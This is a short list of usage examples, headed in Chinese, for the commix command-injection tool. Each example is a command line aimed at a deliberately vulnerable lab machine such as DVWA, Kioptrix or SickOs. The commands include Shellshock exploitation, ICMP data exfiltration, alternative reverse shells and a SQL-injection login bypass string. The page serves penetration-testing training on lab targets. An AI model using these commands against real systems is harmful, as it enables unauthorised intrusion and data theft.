commix使用示例
1. Exploiting Damn Vulnerable Web App:
1 | root@kali:~/commix# python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=127.0.0.1&submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4" |
2. Exploiting php-Charts 1.0 using injection payload suffix & prefix string:
1 | root@kali:~/commix# python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=test" --prefix="'" --suffix="//" |
3. Exploiting OWASP Mutillidae using extra headers and HTTP proxy:
1 | root@kali:~/commix# python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=127.0.0.1" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081" |
4. Exploiting Persistence using ICMP exfiltration technique:
1 | root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8" |
5. Exploiting Persistence using an alternative (python) shell:
1 | root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --alter-shell="Python" |
6. Exploiting Kioptrix: Level 1.1 (#2):
1 | root@kali:~/commix# python commix.py --url="http://192.168.178.2/pingit.php" --data="ip=127.0.0.1E&submit=submit" --auth-url="http://192.168.178.2/index.php" --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login" |
7. Exploiting Kioptrix: 2014 (#5) using custom user-agent and specified injection technique:
1 | root@kali:~/commix# python commix.py --url="http://192.168.178.6:8080/phptax/drawimage.php?pfilez=127.0.0.1&pdf=make" --user-agent="Mozilla/4.0 Mozilla4_browser" --technique="f" --root-dir="/" |
8. Exploiting CVE-2014-6271/Shellshock:
1 | root@kali:~/commix# python commix.py --url="http://192.168.178.4/cgi-bin/status/" --shellshock |
9. Exploiting commix-testbed (cookie) using cookie-based injection:
1 | root@kali:~/commix# python commix.py --url="http://192.168.2.8/commix-testbed/scenarios/cookie/cookie(blind).php" --cookie="addr=127.0.0.1" |
10. Exploiting commix-testbed (user-agent) using ua-based injection:
1 | root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/user-agent/ua(blind).php" --level=3 |
11. Exploiting commix-testbed (referer) using referer-based injection:
1 | root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/referer/referer(classic).php" --level=3 |
12. Exploiting Flick 2 using custom headers and base64 encoding option:
1 | root@kali:~/commix# python commix.py --url="https://192.168.2.12/do/cmd/*" --headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" --base64 |
13. Exploiting commix-testbed (JSON-based) using JSON POST data:
1 | root@kali:~/commix# python commix.py --url="http://192.168.2.11/commix-testbed/scenarios/regular/POST/classic_json.php" --data='{"addr":"127.0.0.1","name":"ancst"}' |
14. Exploiting SickOs 1.1 using shellshock module and HTTP proxy:
1 | root@kali:~/commix# python commix.py --url="http://192.168.2.8/cgi-bin/status" --shellshock --proxy="192.168.2.8:3128"` |